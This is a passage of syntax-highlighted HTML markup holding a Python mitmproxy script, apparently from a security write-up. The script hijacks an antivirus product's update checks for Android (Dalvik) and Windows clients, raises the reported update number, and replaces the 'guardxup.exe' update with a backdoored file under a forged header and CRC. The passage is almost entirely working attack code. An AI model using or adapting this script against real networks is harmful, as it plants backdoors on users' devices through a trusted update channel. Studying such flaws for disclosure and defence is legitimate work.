id=\"crayon-5a1c8f5d60531148303101-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] flow.request.host:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">host<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-57\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;cgi-bin\/imsa-lite.pl&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Dalvik&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;User-Agent&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">content<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">compile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;antispam[s|t].*n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">original_update_number<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-66\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-70\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;cgi-bin\/virusutilities.pl&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;virusutilities&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;User-Agent&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-71\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] Found update response, modifying&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">content<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">compile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;update[s|t].*n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">the_result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">original_update_number<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-79\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_number<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Update_number&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update_number<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-81\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Replace number&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">to_replace<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-82\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">original_update_number<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">to_replace<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[*] Updated content&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-84\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-86\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;guard&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;full&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">path <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[*] Found guardxup.exe request! Modifying request and pushing provided file!&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">crc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">win_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">backdoored_file<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">file_out<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">update_header<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_out&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-93\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/tmp\/update_test.full&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;wb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">content <\/span><\/div>\n<div class=\"crayon-line 